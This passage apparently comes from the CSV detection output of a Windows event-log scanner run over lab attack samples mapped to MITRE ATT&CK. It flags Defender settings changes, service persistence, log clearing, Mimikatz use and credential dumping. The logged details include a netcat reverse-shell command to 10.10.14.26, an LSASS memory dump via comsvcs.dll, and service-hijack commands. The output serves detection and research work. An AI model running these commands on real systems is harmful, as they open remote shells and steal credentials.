ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 20:15:06.755 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 20:15:06.762 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 20:15:06.766 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-07 23:52:54.848 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time"" /v FailureCommand /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x2a58 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx 
+2021-10-07 23:53:02.147 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc failure W32Time command= ""\""c:\Windows\system32\pentestlab.exe\"""" | Path: C:\Windows\System32\sc.exe | PID: 0xa00 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx +2021-10-08 00:36:23.429 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc config xboxgip binPath= ""C:\windows\system32\pentestlab.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x29cc | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-08 00:36:24.892 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xboxgip"" /v ImagePath /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x11b8 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx +2021-10-08 03:21:36.864 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): 
""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-08 03:21:36.889 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\xboxgip -name ImagePath -value ""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-08 03:21:37.136 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-ItemProperty): ""Set-ItemProperty"" ParameterBinding(Set-ItemProperty): name=""Path""; value=""HKLM:\System\CurrentControlSet\services\xboxgip"" ParameterBinding(Set-ItemProperty): name=""Name""; value=""ImagePath"" ParameterBinding(Set-ItemProperty): name=""Value""; value=""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-08 03:21:37.137 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-08 03:21:37.143 
+09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-08 03:21:37.146 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with malicious path.evtx +2021-10-08 03:30:51.237 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-08 03:30:51.247 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-ItemProperty -path HKLM:\System\CurrentControlSet\services\xboxgip -name FailureCommand -value ""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-08 03:30:51.251 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-ItemProperty): ""Set-ItemProperty"" ParameterBinding(Set-ItemProperty): name=""Path""; 
value=""HKLM:\System\CurrentControlSet\services\xboxgip"" ParameterBinding(Set-ItemProperty): name=""Name""; value=""FailureCommand"" ParameterBinding(Set-ItemProperty): name=""Value""; value=""C:\nc.exe -e powershell.exe 10.10.14.26 4447""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-08 03:30:51.252 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-08 03:30:51.266 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-08 03:30:51.269 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service abuse with Failure Command.evtx +2021-10-08 17:53:42.131 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc sdset xboxgip ""D:(A;;CCLCSWRPWPDTLOCRRC;;;SY) | Path: 
C:\Windows\System32\sc.exe | PID: 0x1d28 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (sc).evtx +2021-10-08 19:05:29.432 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\XblGameSave\Security"" /v Security /t REG_BINARY /d fe340ead | Path: C:\Windows\System32\reg.exe | PID: 0x18c4 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx +2021-10-08 19:05:36.298 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2af0 | User: WIN10-02$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx +2021-10-08 21:56:58.803 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:04.504 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz 
Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: gentilguest | IP Address: 20.188.56.147 | Process: | Target Server: printnightmare.gentilkiwi.com,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: rundll32 printui.dll,PrintUIEntry /in /n""\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"" | Path: C:\Windows\System32\rundll32.exe | PID: 0x1670 | User: admmig | LID: 0x65b0f5db",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:18.646 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege 
Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-08 21:57:19.072 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" +2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx +2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx +2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,low,Persis,Local User Account Created,User: toto3 | SID: S-1-5-21-3410678313-1251427014-1131291384-1004,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin 
Shares/ID4688-Network share manipulation via commandline.evtx +2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,medium,,File Created_Sysmon Alert,T1003 | Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 512 | PGUID: 7CF65FC7-6649-6165-0B00-000000001200,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx +2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,../hayabusa-rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx +2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,info,,Logon Type 9 - NewCredentials,User: admmig | Computer: - | IP Addr: ::1 | LID: 0x266e045 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x266e045,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 
+09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x269eec8 | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 
dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,PowerShell Get-Process LSASS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.855 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:55.871 +09:00,FS03.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: 
